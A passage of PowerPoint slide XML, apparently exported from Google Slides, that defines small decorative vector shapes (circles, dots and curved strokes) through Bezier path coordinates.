                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F606C04A-9E84-9C18-8A8A-3CF7EDB93FE5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5183876" y="379114"/>
                <a:ext cx="74200" cy="74775"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2968" h="2991" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1986" y="571"/>
                      <a:pt x="2397" y="982"/>
                      <a:pt x="2397" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2397" y="2009"/>
                      <a:pt x="1986" y="2420"/>
                      <a:pt x="1484" y="2420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2420"/>
                      <a:pt x="571" y="2009"/>
                      <a:pt x="571" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1484" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="663" y="1"/>
                      <a:pt x="1" y="685"/>
                      <a:pt x="1" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2306"/>
                      <a:pt x="663" y="2991"/>
                      <a:pt x="1484" y="2991"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2991"/>
                      <a:pt x="2968" y="2306"/>
                      <a:pt x="2968" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2968" y="685"/>
                      <a:pt x="2306" y="1"/>
                      <a:pt x="1484"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99" name="Google Shape;1277;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F649CD72-F729-22E4-1EE0-24C84D03EB34}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5536161" y="4856289"/>
                <a:ext cx="28550" cy="28400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1136" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="560" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="0"/>
                      <a:pt x="263" y="52"/>
                      <a:pt x="160" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="269"/>
                      <a:pt x="1" y="428"/>
                      <a:pt x="1" y="565"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="634"/>
                      <a:pt x="1" y="725"/>
                      <a:pt x="46" y="794"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="862"/>
                      <a:pt x="115" y="908"/>
                      <a:pt x="160" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="1090"/>
                      <a:pt x="411" y="1136"/>
                      <a:pt x="571" y="1136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="640" y="1136"/>
                      <a:pt x="708" y="1113"/>
                      <a:pt x="777" y="1090"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845" y="1067"/>
                      <a:pt x="914" y="1022"/>
                      <a:pt x="959" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1073" y="862"/>
                      <a:pt x="1142" y="725"/>
                      <a:pt x="1142" y="565"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="428"/>
                      <a:pt x="1073" y="269"/>
                      <a:pt x="959" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="857" y="52"/>
                      <a:pt x="708" y="0"/>
                      <a:pt x="560"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00" name="Google Shape;1278;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998F0319-C39C-6211-877E-CEF694FC95D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="680350" y="2063100"/>
                <a:ext cx="28550" cy="28900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1156" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="549" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="406" y="1"/>
                      <a:pt x="269" y="66"/>
                      <a:pt x="160" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="289"/>
                      <a:pt x="1" y="426"/>
                      <a:pt x="1" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="722"/>
                      <a:pt x="46" y="882"/>
                      <a:pt x="160" y="973"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="1087"/>
                      <a:pt x="411" y="1156"/>
                      <a:pt x="571" y="1156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="594" y="1156"/>
                      <a:pt x="640" y="1133"/>
                      <a:pt x="663" y="1133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="1133"/>
                      <a:pt x="754" y="1110"/>
                      <a:pt x="777" y="1110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="822" y="1087"/>
                      <a:pt x="845" y="1065"/>
                      <a:pt x="868" y="1042"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="914" y="1019"/>
                      <a:pt x="936" y="996"/>
                      <a:pt x="959" y="973"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1073" y="882"/>
                      <a:pt x="1142" y="722"/>
                      <a:pt x="1142" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="426"/>
                      <a:pt x="1073" y="289"/>
                      <a:pt x="959" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="152"/>
                      <a:pt x="914" y="129"/>
                      <a:pt x="868" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845" y="83"/>
                      <a:pt x="822" y="60"/>
                      <a:pt x="777" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="754" y="37"/>
                      <a:pt x="708" y="15"/>
                      <a:pt x="663" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="624" y="5"/>
                      <a:pt x="586" y="1"/>
                      <a:pt x="549"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01" name="Google Shape;1279;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD02717-DD23-6EBE-025B-44B87F9DEF0C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5498775" y="818475"/>
                <a:ext cx="28550" cy="28425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1137" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="571" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="1"/>
                      <a:pt x="491" y="6"/>
                      <a:pt x="457" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="18"/>
                      <a:pt x="389" y="41"/>
                      <a:pt x="343" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="63"/>
                      <a:pt x="274" y="86"/>
                      <a:pt x="252" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="109"/>
                      <a:pt x="183" y="132"/>
                      <a:pt x="160" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="269"/>
                      <a:pt x="0" y="429"/>
                      <a:pt x="0" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="725"/>
                      <a:pt x="46" y="862"/>
                      <a:pt x="160" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="999"/>
                      <a:pt x="229" y="1022"/>
                      <a:pt x="252" y="1045"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="274" y="1068"/>
                      <a:pt x="320" y="1091"/>
                      <a:pt x="343" y="1091"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="389" y="1113"/>
                      <a:pt x="411" y="1136"/>
                      <a:pt x="457" y="1136"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="685" y="1136"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="1136"/>
                      <a:pt x="754" y="1113"/>
                      <a:pt x="777" y="1091"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="822" y="1091"/>
                      <a:pt x="845" y="1068"/>
                      <a:pt x="891" y="1045"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="914" y="1022"/>
                      <a:pt x="936" y="999"/>
                      <a:pt x="982" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1073" y="862"/>
                      <a:pt x="1142" y="725"/>
                      <a:pt x="1142" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="429"/>
                      <a:pt x="1073" y="269"/>
                      <a:pt x="982" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="132"/>
                      <a:pt x="914" y="109"/>
                      <a:pt x="891" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845" y="86"/>
                      <a:pt x="822" y="63"/>
                      <a:pt x="777" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="754" y="41"/>
                      <a:pt x="708" y="18"/>
                      <a:pt x="685" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="651" y="6"/>
                      <a:pt x="611" y="1"/>
                      <a:pt x="571"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02" name="Google Shape;1280;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A308E036-84E9-6F47-0D0B-D927F82C7329}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="492625" y="4885500"/>
                <a:ext cx="28550" cy="28275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1131" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="559" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="1"/>
                      <a:pt x="263" y="58"/>
                      <a:pt x="160" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="263"/>
                      <a:pt x="0" y="423"/>
                      <a:pt x="0" y="560"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="720"/>
                      <a:pt x="46" y="857"/>
                      <a:pt x="160" y="971"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="274" y="1085"/>
                      <a:pt x="411" y="1131"/>
                      <a:pt x="571" y="1131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="639" y="1131"/>
                      <a:pt x="708" y="1131"/>
                      <a:pt x="776" y="1108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845" y="1062"/>
                      <a:pt x="913" y="1017"/>
                      <a:pt x="959" y="971"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1073" y="857"/>
                      <a:pt x="1141" y="720"/>
                      <a:pt x="1141" y="560"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1141" y="423"/>
                      <a:pt x="1073" y="263"/>
                      <a:pt x="959" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="856" y="58"/>
                      <a:pt x="708" y="1"/>
                      <a:pt x="559"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03" name="Google Shape;1281;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD7D9CE-FF13-5C1F-976E-0165DAFA02FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2655300" y="788800"/>
                <a:ext cx="28575" cy="28425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1143" h="1137" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="560" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="412" y="1"/>
                      <a:pt x="263" y="52"/>
                      <a:pt x="161" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="269"/>
                      <a:pt x="1" y="406"/>
                      <a:pt x="1" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="588"/>
                      <a:pt x="1" y="634"/>
                      <a:pt x="1" y="657"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="703"/>
                      <a:pt x="24" y="748"/>
                      <a:pt x="47" y="771"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="817"/>
                      <a:pt x="69" y="840"/>
                      <a:pt x="92" y="862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="908"/>
                      <a:pt x="138" y="931"/>
                      <a:pt x="161" y="954"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="1068"/>
                      <a:pt x="412" y="1136"/>
                      <a:pt x="572" y="1136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="709" y="1136"/>
                      <a:pt x="868" y="1068"/>
                      <a:pt x="960" y="954"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1005" y="931"/>
                      <a:pt x="1028" y="908"/>
                      <a:pt x="1051" y="862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1051" y="840"/>
                      <a:pt x="1074" y="817"/>
                      <a:pt x="1097" y="771"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1097" y="748"/>
                      <a:pt x="1119" y="703"/>
                      <a:pt x="1119" y="657"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="634"/>
                      <a:pt x="1142" y="588"/>
                      <a:pt x="1142" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="406"/>
                      <a:pt x="1074" y="269"/>
                      <a:pt x="960" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="857" y="52"/>
                      <a:pt x="709" y="1"/>
                      <a:pt x="560"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04" name="Google Shape;1282;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F1029F-8916-4898-9142-001B2BD65772}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5721440" y="305827"/>
                <a:ext cx="28550" cy="28425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1137" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="571" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="1"/>
                      <a:pt x="491" y="6"/>
                      <a:pt x="457" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="18"/>
                      <a:pt x="388" y="41"/>
                      <a:pt x="343" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="63"/>
                      <a:pt x="274" y="86"/>
                      <a:pt x="251" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="109"/>
                      <a:pt x="183" y="132"/>
                      <a:pt x="160" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="269"/>
                      <a:pt x="0" y="429"/>
                      <a:pt x="0" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="725"/>
                      <a:pt x="69" y="862"/>
                      <a:pt x="160" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="999"/>
                      <a:pt x="229" y="1022"/>
                      <a:pt x="251" y="1045"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="274" y="1068"/>
                      <a:pt x="320" y="1091"/>
                      <a:pt x="343" y="1091"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="1113"/>
                      <a:pt x="411" y="1136"/>
                      <a:pt x="457" y="1136"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="685" y="1136"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="1136"/>
                      <a:pt x="754" y="1113"/>
                      <a:pt x="776" y="1091"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="822" y="1091"/>
                      <a:pt x="845" y="1068"/>
                      <a:pt x="890" y="1045"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="913" y="1022"/>
                      <a:pt x="936" y="999"/>
                      <a:pt x="982" y="976"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1073" y="862"/>
                      <a:pt x="1142" y="725"/>
                      <a:pt x="1142" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="429"/>
                      <a:pt x="1073" y="269"/>
                      <a:pt x="982" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="132"/>
                      <a:pt x="913" y="109"/>
                      <a:pt x="890" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845" y="86"/>
                      <a:pt x="822" y="63"/>
                      <a:pt x="776" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="754" y="41"/>
                      <a:pt x="708" y="18"/>
                      <a:pt x="685" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="651" y="6"/>
                      <a:pt x="611" y="1"/>
                      <a:pt x="571"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05" name="Google Shape;1283;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12516C4-9E68-82D1-A405-1904764274AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3878175" y="5028675"/>
                <a:ext cx="28550" cy="28325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1142" h="1133" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="569" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="421" y="0"/>
                      <a:pt x="274" y="66"/>
                      <a:pt x="183" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="197"/>
                      <a:pt x="115" y="220"/>
                      <a:pt x="115" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="288"/>
                      <a:pt x="69" y="311"/>
                      <a:pt x="46" y="357"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="380"/>
                      <a:pt x="23" y="425"/>
                      <a:pt x="23" y="448"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="494"/>
                      <a:pt x="1" y="540"/>
                      <a:pt x="1" y="562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="722"/>
                      <a:pt x="69" y="859"/>
                      <a:pt x="183" y="973"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="1087"/>
                      <a:pt x="434" y="1133"/>
                      <a:pt x="571" y="1133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="1133"/>
                      <a:pt x="868" y="1087"/>
                      <a:pt x="982" y="973"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1096" y="859"/>
                      <a:pt x="1142" y="722"/>
                      <a:pt x="1142" y="562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="540"/>
                      <a:pt x="1142" y="494"/>
                      <a:pt x="1142" y="448"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1142" y="425"/>
                      <a:pt x="1119" y="380"/>
                      <a:pt x="1096" y="357"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1096" y="311"/>
                      <a:pt x="1073" y="288"/>
                      <a:pt x="1051" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="220"/>
                      <a:pt x="1005" y="197"/>
                      <a:pt x="982" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="959" y="151"/>
                      <a:pt x="936" y="106"/>
                      <a:pt x="891" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="868" y="83"/>
                      <a:pt x="822" y="60"/>
                      <a:pt x="800" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="754" y="37"/>
                      <a:pt x="731" y="15"/>
                      <a:pt x="685" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="647" y="5"/>
                      <a:pt x="608" y="0"/>
                      <a:pt x="569"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06" name="Google Shape;1284;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91821A2D-AFAC-D40B-5AAF-B71AA299DC78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="734000" y="799425"/>
                <a:ext cx="91900" cy="127350"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3676" h="5094" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3347" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3257" y="1"/>
                      <a:pt x="3162" y="46"/>
                      <a:pt x="3104" y="118"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="91" y="4637"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4774"/>
                      <a:pt x="46" y="4957"/>
                      <a:pt x="183" y="5025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="228" y="5071"/>
                      <a:pt x="274" y="5094"/>
                      <a:pt x="343" y="5094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="434" y="5094"/>
                      <a:pt x="525" y="5048"/>
                      <a:pt x="571" y="4957"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3584" y="437"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3675" y="300"/>
                      <a:pt x="3629" y="141"/>
                      <a:pt x="3492" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3451" y="16"/>
                      <a:pt x="3399" y="1"/>
                      <a:pt x="3347"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07" name="Google Shape;1285;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F686B65-85E3-FEAA-CFDB-663F325CC3AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5971250" y="1563275"/>
                <a:ext cx="131275" cy="288500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="5251" h="11540" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3167" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3139" y="1"/>
                      <a:pt x="3111" y="5"/>
                      <a:pt x="3082" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2945" y="58"/>
                      <a:pt x="2854" y="218"/>
                      <a:pt x="2900" y="355"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2922" y="424"/>
                      <a:pt x="4589" y="6518"/>
                      <a:pt x="115" y="11037"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="11151"/>
                      <a:pt x="1" y="11334"/>
                      <a:pt x="115" y="11448"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="11517"/>
                      <a:pt x="229" y="11539"/>
                      <a:pt x="320" y="11539"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="389" y="11539"/>
                      <a:pt x="457" y="11517"/>
                      <a:pt x="526" y="11448"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5251" y="6678"/>
                      <a:pt x="3470" y="264"/>
                      <a:pt x="3447" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3410" y="83"/>
                      <a:pt x="3295" y="1"/>
                      <a:pt x="3167"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08" name="Google Shape;1286;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A83C169-E2B2-9B76-7C74-DD0C111D4C7B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2279825" y="4071425"/>
                <a:ext cx="90200" cy="279725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3608" h="11189" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2150" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2133" y="0"/>
                      <a:pt x="2117" y="1"/>
